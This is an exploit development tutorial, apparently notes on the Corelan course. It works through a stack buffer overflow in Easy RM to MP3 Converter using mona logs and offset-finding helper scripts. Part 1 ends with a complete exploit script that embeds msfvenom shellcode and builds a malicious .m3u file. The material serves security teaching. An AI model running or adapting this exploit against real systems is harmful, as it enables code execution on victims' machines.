Corelan Exploit Course
Part 1: Stack Based Overflows
Based on the first part of the Corelan exploit development course.
The target is Easy RM to MP3 Converter, which loads playlist files. Loading an oversized file crashes it. What follows was tested on Windows 7 Ultimate.
python -c "print('A'*30000)" > crash.m3u
Metasploit is then used to generate a pattern that identifies the offset (Note: pattern_create is limited in size. The default pattern only stays unique for 20280 bytes, after which it repeats. Keep the pattern short, 10000 bytes here, and fill the rest of the buffer with 'A'):
python3 -c "print('A'*20000, end='')" > file.m3u
pattern_create.rb 10000 >> file.m3u
EIP then holds 76483676:
pattern_offset.rb 76483676
[*] Exact match at offset 6109
So the offset is 20000 + 6109 = 26109 characters. This can be confirmed with the following file, which should leave EIP = 42424242:
python -c "print('A'*26109+'BBBB'+'C'*(30000-26113))" > file.m3u
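The pattern step above in code, as an added example that is not part of the original page: a Python 3 reimplementation of pattern_create / pattern_offset (assumed to behave like the Metasploit tools with their default character sets) that recovers the 6109 and 26109 offsets for the 20000 'A' + 10000-byte-pattern layout, and shows where the pattern starts repeating.

```python
import struct
from itertools import cycle, product
from string import ascii_lowercase, ascii_uppercase, digits

# The default Metasploit pattern is built from 26*26*10 distinct 3-byte triplets
# ("Aa0", "Aa1", ..., "Zz9"); after 20280 bytes it starts over, so a 4-byte value
# read from EIP is only unambiguous inside that window.
PATTERN_PERIOD = 26 * 26 * 10 * 3  # 20280


def pattern_create(length):
    """Same output as pattern_create.rb: 'Aa0Aa1Aa2...' cut to `length` bytes."""
    triplets = (u + l + d for u, l, d in product(ascii_uppercase, ascii_lowercase, digits))
    out = []
    for t in cycle(triplets):  # cycle() keeps repeating past 20280 bytes, like the Ruby tool
        out.append(t)
        if len(out) * 3 >= length:
            break
    return "".join(out)[:length].encode()


def pattern_offset(value, length=PATTERN_PERIOD):
    """Same as pattern_offset.rb for a 32-bit register value shown by the debugger.
    x86 is little-endian, so EIP = 0x76483676 means the bytes b'v6Hv' were in the file."""
    needle = struct.pack("<I", value)
    return pattern_create(length).find(needle)  # -1 when the value is not in the pattern


def buffer_offset(eip, prefix_len, pattern_len):
    """Offset of EIP in a file built as 'A' * prefix_len + pattern_create(pattern_len),
    i.e. the layout used above (20000 'A' followed by a 10000-byte pattern)."""
    off = pattern_offset(eip, pattern_len)
    if off < 0:
        raise ValueError("0x%08x not found in a %d-byte pattern" % (eip, pattern_len))
    return prefix_len + off


def is_unique(length):
    """True when every 4-byte window of the first `length` pattern bytes occurs once,
    i.e. when a pattern_offset hit on such a file cannot be a repeat."""
    p = pattern_create(length)
    windows = [p[i:i + 4] for i in range(length - 3)]
    return len(set(windows)) == len(windows)


if __name__ == "__main__":
    print("offset in file:", buffer_offset(0x76483676, 20000, 10000))  # 26109
    print("pattern unique up to", PATTERN_PERIOD, "bytes:", is_unique(PATTERN_PERIOD))
```

If EIP shows a value that pattern_offset does not find, either the bytes came from the 'A' padding (0x41414141) or the register was not overwritten by the pattern at all; in both cases move the pattern rather than enlarging it past 20280 bytes.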
With that file loaded, ESP points into the C's, so the shellcode can be injected there. mona is then used to find a way to jump to ESP:
!mona modules
0BADF00D !mona modules
---------- Mona command started on 2016-04-17 15:20:03 (v2.0, rev 566) ----------
0BADF00D [+] Processing arguments and criteria
0BADF00D - Pointer access level : X
0BADF00D [+] Generating module info table, hang on...
0BADF00D - Processing modules
0BADF00D - Done. Let's rock 'n roll.
0BADF00D ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D Module info :
0BADF00D ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
0BADF00D ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D 0x6b2b0000 | 0x6b316000 | 0x00066000 | True | True | True | True | True | 7.0.7600.16385 [MSVCP60.dll] (C:\Windows\system32\MSVCP60.dll)
0BADF00D 0x71440000 | 0x71472000 | 0x00032000 | True | True | True | True | True | 6.1.7600.16385 [WINMM.dll] (C:\Windows\system32\WINMM.dll)
0BADF00D 0x734d0000 | 0x734d6000 | 0x00006000 | True | True | True | True | True | 6.1.7600.16385 [sensapi.dll] (C:\Windows\system32\sensapi.dll)
0BADF00D 0x77110000 | 0x77246000 | 0x00136000 | True | True | True | True | True | 8.00.7600.16385 [urlmon.dll] (C:\Windows\system32\urlmon.dll)
0BADF00D 0x00400000 | 0x004be000 | 0x000be000 | False | False | False | False | False | 2.7.3.700 [RM2MP3Converter.exe] (C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe)
0BADF00D 0x74550000 | 0x74560000 | 0x00010000 | True | True | True | True | True | 6.1.7601.17514 [NLAapi.dll] (C:\Windows\system32\NLAapi.dll)
0BADF00D 0x75970000 | 0x75a8d000 | 0x0011d000 | True | True | True | True | True | 6.1.7600.16385 [CRYPT32.dll] (C:\Windows\system32\CRYPT32.dll)
0BADF00D 0x758a0000 | 0x758ac000 | 0x0000c000 | True | True | True | True | True | 6.1.7601.17514 [MSASN1.dll] (C:\Windows\system32\MSASN1.dll)
0BADF00D 0x75310000 | 0x75316000 | 0x00006000 | True | True | True | True | True | 6.1.7600.16385 [wship6.dll] (C:\Windows\System32\wship6.dll)
0BADF00D 0x76140000 | 0x76214000 | 0x000d4000 | True | True | True | True | True | 6.1.7600.16385 [kernel32.dll] (C:\Windows\system32\kernel32.dll)
0BADF00D 0x774e0000 | 0x7758c000 | 0x000ac000 | True | True | True | True | True | 7.0.7600.16385 [msvcrt.dll] (C:\Windows\system32\msvcrt.dll)
0BADF00D 0x75780000 | 0x7578c000 | 0x0000c000 | True | True | True | True | True | 6.1.7600.16385 [CRYPTBASE.dll] (C:\Windows\system32\CRYPTBASE.dll)
0BADF00D 0x74150000 | 0x74163000 | 0x00013000 | True | True | True | True | True | 6.1.7600.16385 [dwmapi.dll] (C:\Windows\system32\dwmapi.dll)
0BADF00D 0x776e0000 | 0x7781c000 | 0x0013c000 | True | True | True | True | True | 6.1.7600.16385 [ntdll.dll] (C:\Windows\SYSTEM32\ntdll.dll)
0BADF00D 0x01430000 | 0x014a1000 | 0x00071000 | True | False | False | False | False | -1.0- [MSRMCcodec00.dll] (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec00.dll)
0BADF00D 0x74fc0000 | 0x75004000 | 0x00044000 | True | True | True | True | True | 6.1.7600.16385 [dnsapi.DLL] (C:\Windows\system32\dnsapi.DLL)
0BADF00D 0x778a0000 | 0x778b9000 | 0x00019000 | True | True | True | True | True | 6.1.7600.16385 [sechost.dll] (C:\Windows\SYSTEM32\sechost.dll)
0BADF00D 0x6b720000 | 0x6b758000 | 0x00038000 | True | True | True | True | True | 6.1.7600.16385 [odbcint.dll] (C:\Windows\system32\odbcint.dll)
0BADF00D 0x74c30000 | 0x74c35000 | 0x00005000 | True | True | True | True | True | 6.1.7600.16385 [wshtcpip.dll] (C:\Windows\System32\wshtcpip.dll)
0BADF00D 0x03150000 | 0x0361d000 | 0x004cd000 | True | False | False | False | False | -1.0- [MSRMCcodec02.dll] (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
0BADF00D 0x6fd50000 | 0x6fd61000 | 0x00011000 | True | True | True | True | True | 7.0.7600.16385 [MSVCIRT.dll] (C:\Windows\system32\MSVCIRT.dll)
0BADF00D 0x77830000 | 0x7783a000 | 0x0000a000 | True | True | True | True | True | 6.1.7600.16385 [LPK.dll] (C:\Windows\system32\LPK.dll)
0BADF00D 0x003f0000 | 0x00400000 | 0x00010000 | True | False | False | False | False | -1.0- [MSRMfilter02.dll] (C:\Program Files\Easy RM to MP3 Converter\MSRMfilter02.dll)
0BADF00D 0x75f40000 | 0x7613b000 | 0x001fb000 | True | True | True | True | True | 8.00.7601.17514 [iertutil.dll] (C:\Windows\system32\iertutil.dll)
0BADF00D 0x77380000 | 0x7741d000 | 0x0009d000 | True | True | True | True | True | 1.0626.7601.17514 [USP10.dll] (C:\Windows\system32\USP10.dll)
0BADF00D 0x71560000 | 0x71566000 | 0x00006000 | True | True | True | True | True | 6.1.7600.16385 [rasadhlp.dll] (C:\Windows\system32\rasadhlp.dll)
0BADF00D 0x73b90000 | 0x73bc8000 | 0x00038000 | True | True | True | True | True | 6.1.7600.16385 [fwpuclnt.dll] (C:\Windows\System32\fwpuclnt.dll)
0BADF00D 0x74df0000 | 0x74df7000 | 0x00007000 | True | True | True | True | True | 6.1.7600.16385 [WINNSI.DLL] (C:\Windows\system32\WINNSI.DLL)
0BADF00D 0x75710000 | 0x7572b000 | 0x0001b000 | True | True | True | True | True | 6.1.7601.17514 [SspiCli.dll] (C:\Windows\system32\SspiCli.dll)
0BADF00D 0x74e00000 | 0x74e1c000 | 0x0001c000 | True | True | True | True | True | 6.1.7600.16385 [iphlpapi.DLL] (C:\Windows\system32\iphlpapi.DLL)
0BADF00D 0x6a620000 | 0x6a73c000 | 0x0011c000 | True | True | True | True | True | 6.06.8063.0 [MFC42.DLL] (C:\Windows\system32\MFC42.DLL)
0BADF00D 0x75b40000 | 0x75c9c000 | 0x0015c000 | True | True | True | True | True | 6.1.7600.16385 [ole32.dll] (C:\Windows\system32\ole32.dll)
0BADF00D 0x77480000 | 0x774d7000 | 0x00057000 | True | True | True | True | True | 6.1.7600.16385 [SHLWAPI.dll] (C:\Windows\system32\SHLWAPI.dll)
0BADF00D 0x75ca0000 | 0x75d69000 | 0x000c9000 | True | True | True | True | True | 6.1.7601.17514 [USER32.dll] (C:\Windows\system32\USER32.dll)
0BADF00D 0x75d70000 | 0x75d8f000 | 0x0001f000 | True | True | True | True | True | 6.1.7601.17514 [IMM32.DLL] (C:\Windows\system32\IMM32.DLL)
0BADF00D 0x77590000 | 0x7760b000 | 0x0007b000 | True | True | True | True | True | 6.1.7600.16385 [comdlg32.dll] (C:\Windows\system32\comdlg32.dll)
0BADF00D 0x73820000 | 0x7382d000 | 0x0000d000 | True | True | True | True | True | 6.1.7601.17514 [rtutils.dll] (C:\Windows\system32\rtutils.dll)
0BADF00D 0x6fd90000 | 0x6fe1c000 | 0x0008c000 | True | True | True | True | True | 6.1.7601.17514 [ODBC32.dll] (C:\Windows\system32\ODBC32.dll)
0BADF00D 0x74dc0000 | 0x74de1000 | 0x00021000 | True | True | True | True | True | 6.1.7600.16385 [ntmarta.dll] (C:\Windows\system32\ntmarta.dll)
0BADF00D 0x70920000 | 0x70930000 | 0x00010000 | True | True | True | True | True | 6.1.7600.16385 [napinsp.dll] (C:\Windows\system32\napinsp.dll)
0BADF00D 0x745d0000 | 0x74610000 | 0x00040000 | True | True | True | True | True | 6.1.7600.16385 [uxtheme.dll] (C:\Windows\system32\uxtheme.dll)
0BADF00D 0x75eb0000 | 0x75f3f000 | 0x0008f000 | True | True | True | True | True | 6.1.7601.17514 [OLEAUT32.dll] (C:\Windows\system32\OLEAUT32.dll)
0BADF00D 0x72800000 | 0x72815000 | 0x00015000 | True | True | True | True | True | 6.1.7600.16385 [rasman.dll] (C:\Windows\system32\rasman.dll)
0BADF00D 0x76220000 | 0x76e6a000 | 0x00c4a000 | True | True | True | True | True | 6.1.7601.17514 [SHELL32.dll] (C:\Windows\system32\SHELL32.dll)
0BADF00D 0x75d90000 | 0x75e31000 | 0x000a1000 | True | True | True | True | True | 6.1.7600.16385 [RPCRT4.dll] (C:\Windows\system32\RPCRT4.dll)
0BADF00D 0x748d0000 | 0x74a6e000 | 0x0019e000 | True | True | True | True | True | 6.10 [comctl32.dll] (C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll)
0BADF00D 0x708f0000 | 0x708f8000 | 0x00008000 | True | True | True | True | True | 6.1.7600.16385 [winrnr.dll] (C:\Windows\System32\winrnr.dll)
0BADF00D 0x77010000 | 0x77105000 | 0x000f5000 | True | True | True | True | True | 8.00.7600.16385 [WININET.dll] (C:\Windows\system32\WININET.dll)
0BADF00D 0x6e6c0000 | 0x6e744000 | 0x00084000 | True | True | True | True | True | 5.82 [COMCTL32.dll] (C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\COMCTL32.dll)
0BADF00D 0x77850000 | 0x77895000 | 0x00045000 | True | True | True | True | True | 6.1.7600.16385 [WLDAP32.dll] (C:\Windows\system32\WLDAP32.dll)
0BADF00D 0x77610000 | 0x776dc000 | 0x000cc000 | True | True | True | True | True | 6.1.7600.16385 [MSCTF.dll] (C:\Windows\system32\MSCTF.dll)
0BADF00D 0x75800000 | 0x7580b000 | 0x0000b000 | True | True | True | True | True | 6.1.7600.16385 [profapi.dll] (C:\Windows\system32\profapi.dll)
0BADF00D 0x75ae0000 | 0x75b2a000 | 0x0004a000 | True | True | True | True | True | 6.1.7600.16385 [KERNELBASE.dll] (C:\Windows\system32\KERNELBASE.dll)
0BADF00D 0x74e20000 | 0x74e29000 | 0x00009000 | True | True | True | True | True | 6.1.7600.16385 [VERSION.dll] (C:\Windows\system32\VERSION.dll)
0BADF00D 0x75320000 | 0x7535c000 | 0x0003c000 | True | True | True | True | True | 6.1.7600.16385 [mswsock.dll] (C:\Windows\System32\mswsock.dll)
0BADF00D 0x014d0000 | 0x0156f000 | 0x0009f000 | True | False | False | False | False | -1.0- [MSRMfilter01.dll] (C:\Program Files\Easy RM to MP3 Converter\MSRMfilter01.dll)
0BADF00D 0x778c0000 | 0x7790e000 | 0x0004e000 | True | True | True | True | True | 6.1.7601.17514 [GDI32.dll] (C:\Windows\system32\GDI32.dll)
0BADF00D 0x003e0000 | 0x003e7000 | 0x00007000 | True | False | False | False | False | -1.0- [MSRMCcodec01.dll] (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec01.dll)
0BADF00D 0x72820000 | 0x72872000 | 0x00052000 | True | True | True | True | True | 6.1.7600.16385 [RASAPI32.dll] (C:\Windows\system32\RASAPI32.dll)
0BADF00D 0x70fd0000 | 0x71021000 | 0x00051000 | True | True | True | True | True | 6.1.7600.16385 [WINSPOOL.DRV] (C:\Windows\system32\WINSPOOL.DRV)
0BADF00D 0x10000000 | 0x10071000 | 0x00071000 | False | False | False | False | False | -1.0- [MSRMfilter03.dll] (C:\Program Files\Easy RM to MP3 Converter\MSRMfilter03.dll)
0BADF00D 0x01280000 | 0x01292000 | 0x00012000 | True | False | False | False | False | -1.0- [MSLog.dll] (C:\Program Files\Easy RM to MP3 Converter\MSLog.dll)
0BADF00D 0x772e0000 | 0x77380000 | 0x000a0000 | True | True | True | True | True | 6.1.7600.16385 [ADVAPI32.dll] (C:\Windows\system32\ADVAPI32.dll)
0BADF00D 0x00650000 | 0x0066e000 | 0x0001e000 | True | False | False | False | False | 1.0.1.8 [wmatimer.dll] (C:\Program Files\Easy RM to MP3 Converter\wmatimer.dll)
0BADF00D 0x75e40000 | 0x75e75000 | 0x00035000 | True | True | True | True | True | 6.1.7600.16385 [WS2_32.dll] (C:\Windows\system32\WS2_32.dll)
0BADF00D 0x77820000 | 0x77826000 | 0x00006000 | True | True | True | True | True | 6.1.7600.16385 [NSI.dll] (C:\Windows\system32\NSI.dll)
0BADF00D 0x70900000 | 0x70912000 | 0x00012000 | True | True | True | True | True | 6.1.7600.16385 [pnrpnsp.dll] (C:\Windows\system32\pnrpnsp.dll)
0BADF00D ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D
0BADF00D
0BADF00D [+] This mona.py action took 0:00:01.412000
[15:20:48] Thread 000006E4 terminated, exit code 0
The only modules without protections (no Rebase, SafeSEH or ASLR) are MSRMfilter03.dll and RM2MP3Converter.exe. However, the executable is mapped at 0x00400000, so every address in it contains a null byte (\x00) and cannot be used.
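As an added example (not from the original page): a Python 3 parser for the !mona modules table above that applies the same filtering, no Rebase / SafeSEH / ASLR, and no bad byte forced by the module's address range. The rows are copied from the table (constructed sample input); the function names are this example's own.

```python
import re

# Rows copied from the "!mona modules" table above (constructed sample input; 0BADF00D is
# the Immunity log address column, and the columns are
# Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version [Module] (Path)).
MONA_MODULES = r"""
0BADF00D 0x6b2b0000 | 0x6b316000 | 0x00066000 | True | True | True | True | True | 7.0.7600.16385 [MSVCP60.dll] (C:\Windows\system32\MSVCP60.dll)
0BADF00D 0x00400000 | 0x004be000 | 0x000be000 | False | False | False | False | False | 2.7.3.700 [RM2MP3Converter.exe] (C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe)
0BADF00D 0x01430000 | 0x014a1000 | 0x00071000 | True | False | False | False | False | -1.0- [MSRMCcodec00.dll] (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec00.dll)
0BADF00D 0x10000000 | 0x10071000 | 0x00071000 | False | False | False | False | False | -1.0- [MSRMfilter03.dll] (C:\Program Files\Easy RM to MP3 Converter\MSRMfilter03.dll)
0BADF00D 0x776e0000 | 0x7781c000 | 0x0013c000 | True | True | True | True | True | 6.1.7600.16385 [ntdll.dll] (C:\Windows\SYSTEM32\ntdll.dll)
"""

ROW = re.compile(
    r"^(?:[0-9A-F]{8}\s+)?"                                      # optional log address column
    r"0x([0-9a-f]{8}) \| 0x([0-9a-f]{8}) \| 0x[0-9a-f]{8} \| "   # base, top, size
    r"(True|False) \| (True|False) \| (True|False) \| "          # rebase, safeseh, aslr
    r"(True|False) \| (True|False) \| "                          # nxcompat, os dll
    r"\S+ \[([^\]]+)\]"                                          # version [module name]
)


def parse_modules(text):
    """Turn the mona table into dicts; lines that are not table rows are skipped."""
    mods = []
    for line in text.strip().splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        base, top, rebase, safeseh, aslr, nx, osdll, name = m.groups()
        mods.append({
            "name": name, "base": int(base, 16), "top": int(top, 16),
            "rebase": rebase == "True", "safeseh": safeseh == "True",
            "aslr": aslr == "True", "nxcompat": nx == "True", "os": osdll == "True",
        })
    return mods


def constant_high_bytes(base, top):
    """Most-significant bytes shared by every address in [base, top). A bad character
    among them rules the whole module out (the .exe at 0x00400000 always has a 0x00)."""
    shared = []
    for x, y in zip(base.to_bytes(4, "big"), (top - 1).to_bytes(4, "big")):
        if x != y:
            break
        shared.append(x)
    return bytes(shared)


def pointer_ok(addr, badchars=b"\x00"):
    """True when the little-endian encoding of one pointer contains no bad character."""
    return not any(b in badchars for b in addr.to_bytes(4, "little"))


def usable_modules(text, badchars=b"\x00"):
    """Split modules into return-address candidates and rejects, with the reason."""
    usable, rejected = [], []
    for m in parse_modules(text):
        if m["rebase"] or m["safeseh"] or m["aslr"]:
            rejected.append((m["name"], "protected"))
        elif any(b in badchars for b in constant_high_bytes(m["base"], m["top"])):
            rejected.append((m["name"], "every address contains a bad byte"))
        else:
            usable.append(m["name"])
    return usable, rejected


if __name__ == "__main__":
    print(usable_modules(MONA_MODULES))
    # Inside MSRMfilter03.dll only pointers at or above 0x10010000 avoid a 0x00 in byte 2:
    print(pointer_ok(0x1001b058), pointer_ok(0x1000b058))
```

A module passing the range check still needs each candidate pointer checked individually: the first 64 KB of MSRMfilter03.dll (0x10000000 to 0x1000ffff) carry a 0x00 in their second byte, which is why the 0x1001b058 pointer used below is fine and a 0x1000xxxx one would not be.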
mona can also search directly for sequences equivalent to jmp esp:
0BADF00D [+] This mona.py action took 0:00:02.894000
0BADF00D [+] Command used:
0BADF00D !mona jmp -r esp -o
---------- Mona command started on 2016-04-18 12:24:59 (v2.0, rev 566) ----------
0BADF00D [+] Processing arguments and criteria
0BADF00D - Pointer access level : X
0BADF00D - Ignoring OS modules
0BADF00D [+] Generating module info table, hang on...
0BADF00D - Processing modules
0BADF00D - Done. Let's rock 'n roll.
0BADF00D [+] Querying 2 modules
0BADF00D - Querying module RM2MP3Converter.exe
0BADF00D - Querying module MSRMfilter03.dll
0BADF00D - Search complete, processing results
0BADF00D [+] Preparing output file 'jmp.txt'
0BADF00D - (Re)setting logfile jmp.txt
0BADF00D [+] Writing results to jmp.txt
0BADF00D - Number of pointers of type 'push esp # ret 0x08' : 1
0BADF00D - Number of pointers of type 'push esp # ret ' : 4
0BADF00D [+] Results :
004351F6 0x004351f6 : push esp # ret 0x08 | startnull {PAGE_EXECUTE_READ} [RM2MP3Converter.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.7.3.700 (C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe)
0041CFE8 0x0041cfe8 : push esp # ret | startnull {PAGE_EXECUTE_READ} [RM2MP3Converter.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.7.3.700 (C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe)
0043754C 0x0043754c : push esp # ret | startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [RM2MP3Converter.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.7.3.700 (C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe)
0043AE68 0x0043ae68 : push esp # ret | startnull {PAGE_EXECUTE_READ} [RM2MP3Converter.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.7.3.700 (C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe)
1001B058 0x1001b058 : push esp # ret | {PAGE_EXECUTE_READ} [MSRMfilter03.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMfilter03.dll)
0BADF00D Found a total of 5 pointers
0BADF00D
0BADF00D [+] This mona.py action took 0:00:02.314000
[12:25:33] Thread 0000054C terminated, exit code 0
[12:26:32] Thread 000005F4 terminated, exit code 0
A usable return address is found: 0x1001b058 (push esp # ret in MSRMfilter03.dll). The final exploit:
#!/usr/bin/env python
# Exploit Title: Stack Overflow in Easy RM to MP3 Converter
# Date: 18/04/2016
# Exploit Author: Dude
# Vendor Homepage: [link]
# Software Link: [download link if available]
# Version: 2.7.3.700
# Tested on: Windows 7 SP1 Ultimate (the return address sits in a non-ASLR, non-rebased application DLL, so other Windows versions should work too)
# Exploit information
# Offset: 26109
# Return address: 0x1001b058 (push esp # ret in MSRMfilter03.dll)
# Payload: msfvenom -p windows/exec CMD=cmd.exe -f py --bad-chars "\x00\x0d\x0a"
# Bytes literals and binary mode keep \x80-\xff as single bytes under both Python 2 and 3
offset = 20000 + 6109              # 'A' prefix + pattern_offset result
ret = b'\x58\xb0\x01\x10'          # 0x1001b058, little-endian
nop = b'\x90'
buf = b""
buf += b"\xd9\xcf\xbd\x0f\x30\x90\xb7\xd9\x74\x24\xf4\x58\x29"
buf += b"\xc9\xb1\x31\x31\x68\x17\x83\xc0\x04\x03\x67\x23\x72"
buf += b"\x42\x8b\xab\xf0\xad\x73\x2c\x95\x24\x96\x1d\x95\x53"
buf += b"\xd3\x0e\x25\x17\xb1\xa2\xce\x75\x21\x30\xa2\x51\x46"
buf += b"\xf1\x09\x84\x69\x02\x21\xf4\xe8\x80\x38\x29\xca\xb9"
buf += b"\xf2\x3c\x0b\xfd\xef\xcd\x59\x56\x7b\x63\x4d\xd3\x31"
buf += b"\xb8\xe6\xaf\xd4\xb8\x1b\x67\xd6\xe9\x8a\xf3\x81\x29"
buf += b"\x2d\xd7\xb9\x63\x35\x34\x87\x3a\xce\x8e\x73\xbd\x06"
buf += b"\xdf\x7c\x12\x67\xef\x8e\x6a\xa0\xc8\x70\x19\xd8\x2a"
buf += b"\x0c\x1a\x1f\x50\xca\xaf\xbb\xf2\x99\x08\x67\x02\x4d"
buf += b"\xce\xec\x08\x3a\x84\xaa\x0c\xbd\x49\xc1\x29\x36\x6c"
buf += b"\x05\xb8\x0c\x4b\x81\xe0\xd7\xf2\x90\x4c\xb9\x0b\xc2"
buf += b"\x2e\x66\xae\x89\xc3\x73\xc3\xd0\x89\x82\x51\x6f\xff"
buf += b"\x85\x69\x6f\x50\xee\x58\xe4\x3f\x69\x65\x2f\x04\x85"
buf += b"\x2f\x6d\x2d\x0e\xf6\xe4\x6f\x53\x09\xd3\xac\x6a\x8a"
buf += b"\xd1\x4c\x89\x92\x90\x49\xd5\x14\x49\x20\x46\xf1\x6d"
buf += b"\x97\x67\xd0\x0e\x7a\xfc\xf5\xb5\xfc\x99\x09"
# File content: padding up to EIP, return address, NOP sled, shellcode, filler up to 30000 bytes
content = nop*offset + ret + nop*100 + buf + nop*(30000-4-offset-100-len(buf))
# Write the payload file in binary mode
with open('file.m3u', 'wb') as f:
    f.write(content)
Part 2: Jumping to shellcode
Based on the second part of the Corelan exploit development course. SecuritySift also has useful material on the subject.
This section describes the different ways of jumping to the injected shellcode (here [reg] stands for "some register", e.g. jmp esp; it is not the x86 memory-indirect form):
- jmp [reg]: jump directly to the shellcode the register points to
- call [reg]: same effect as jmp [reg] (it additionally pushes a return address)
- pop [reg] ret: pop takes the top of the stack into [reg]. Useful when a usable address sits on the stack: pop until that address is at the top, then ret into it
- push [reg] ret: push the register's value on the stack, then ret. Works well when the shellcode sits exactly at the address held in the register.
- jmp [reg]+[offset]: jump to [reg] plus a fixed offset. Useful when the register does not point exactly at the data of interest.
- blind return
With mona
Instructions of the form jmp [reg], call [reg], push [reg] ret can be found with mona:
!mona jmp -r esp -cm aslr=true,safeseh=true,rebase=true
mona returns the following (Note: the -cm flags include ASLR, SafeSEH and rebased modules in the search; leave them out to keep only pointers that will not move. The default criteria already exclude those modules, which is why the Part 1 run with only -o queried just 2 modules).
0BADF00D [+] This mona.py action took 0:00:00
0BADF00D [+] Command used:
0BADF00D !mona jmp -r esp -cm aslr=true,safeseh=true,rebase=true
---------- Mona command started on 2016-04-18 15:18:38 (v2.0, rev 566) ----------
0BADF00D [+] Processing arguments and criteria
0BADF00D - Pointer access level : X
0BADF00D - Module criteria : ['aslr=true', 'safeseh=true', 'rebase=true']
0BADF00D [+] Generating module info table, hang on...
0BADF00D - Processing modules
0BADF00D - Done. Let's rock 'n roll.
0BADF00D [+] Querying 67 modules
0BADF00D - Querying module MSVCP60.dll
0BADF00D - Querying module WINMM.dll
0BADF00D - Querying module rasman.dll
0BADF00D - Querying module urlmon.dll
0BADF00D - Querying module RM2MP3Converter.exe
0BADF00D - Querying module NLAapi.dll
0BADF00D - Querying module CRYPT32.dll
0BADF00D - Querying module MSASN1.dll
0BADF00D - Querying module wship6.dll
0BADF00D - Querying module kernel32.dll
0BADF00D - Querying module msvcrt.dll
0BADF00D - Querying module CRYPTBASE.dll
0BADF00D - Querying module dwmapi.dll
0BADF00D - Querying module ntdll.dll
0BADF00D - Querying module MSRMCcodec00.dll
0BADF00D - Querying module dnsapi.DLL
0BADF00D - Querying module sechost.dll
0BADF00D - Querying module odbcint.dll
0BADF00D - Querying module wshtcpip.dll
0BADF00D - Querying module MSRMCcodec02.dll
0BADF00D - Querying module MSVCIRT.dll
0BADF00D - Querying module LPK.dll
0BADF00D - Querying module MSRMfilter02.dll
0BADF00D - Querying module iertutil.dll
0BADF00D - Querying module VERSION.dll
0BADF00D - Querying module USP10.dll
0BADF00D - Querying module rasadhlp.dll
0BADF00D - Querying module fwpuclnt.dll
0BADF00D - Querying module WINNSI.DLL
0BADF00D - Querying module SspiCli.dll
0BADF00D - Querying module iphlpapi.DLL
0BADF00D - Querying module MFC42.DLL
0BADF00D - Querying module ole32.dll
0BADF00D - Querying module IMM32.DLL
0BADF00D - Querying module USER32.dll
0BADF00D - Querying module comdlg32.dll
0BADF00D - Querying module rtutils.dll
0BADF00D - Querying module ODBC32.dll
0BADF00D - Querying module ntmarta.dll
0BADF00D - Querying module napinsp.dll
0BADF00D - Querying module uxtheme.dll
0BADF00D - Querying module OLEAUT32.dll
0BADF00D - Querying module sensapi.dll
0BADF00D - Querying module SHELL32.dll
0BADF00D - Querying module RPCRT4.dll
0BADF00D - Querying module comctl32.dll
0BADF00D - Querying module winrnr.dll
0BADF00D - Querying module WININET.dll
0BADF00D - Querying module SHLWAPI.dll
0BADF00D - Querying module MSCTF.dll
0BADF00D - Querying module WLDAP32.dll
0BADF00D - Querying module profapi.dll
0BADF00D - Querying module KERNELBASE.dll
0BADF00D - Querying module COMCTL32.dll
0BADF00D - Querying module mswsock.dll
0BADF00D - Querying module MSRMfilter01.dll
0BADF00D - Querying module GDI32.dll
0BADF00D - Querying module MSRMCcodec01.dll
0BADF00D - Querying module RASAPI32.dll
0BADF00D - Querying module WINSPOOL.DRV
0BADF00D - Querying module MSRMfilter03.dll
0BADF00D - Querying module MSLog.dll
0BADF00D - Querying module ADVAPI32.dll
0BADF00D - Querying module wmatimer.dll
0BADF00D - Querying module WS2_32.dll
0BADF00D - Querying module NSI.dll
0BADF00D - Querying module pnrpnsp.dll
0BADF00D - Search complete, processing results
0BADF00D [+] Preparing output file 'jmp.txt'
0BADF00D - (Re)setting logfile jmp.txt
0BADF00D [+] Writing results to jmp.txt
0BADF00D - Number of pointers of type 'push esp # ret 0x08' : 7
0BADF00D - Number of pointers of type 'push esp # ret 0x0c' : 2
0BADF00D - Number of pointers of type 'push esp # ret 0x04' : 10
0BADF00D - Number of pointers of type 'push esp # ret 0x10' : 20
0BADF00D - Number of pointers of type 'jmp esp' : 130
0BADF00D - Number of pointers of type 'call esp' : 106
0BADF00D - Number of pointers of type 'push esp # ret ' : 223
0BADF00D [+] Results :
004351F6 0x004351f6 : push esp # ret 0x08 | startnull {PAGE_EXECUTE_READ} [RM2MP3Converter.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.7.3.700 (C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe)
027DC2BC 0x027dc2bc (b+0x0007c2bc) : push esp # ret 0x08 | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
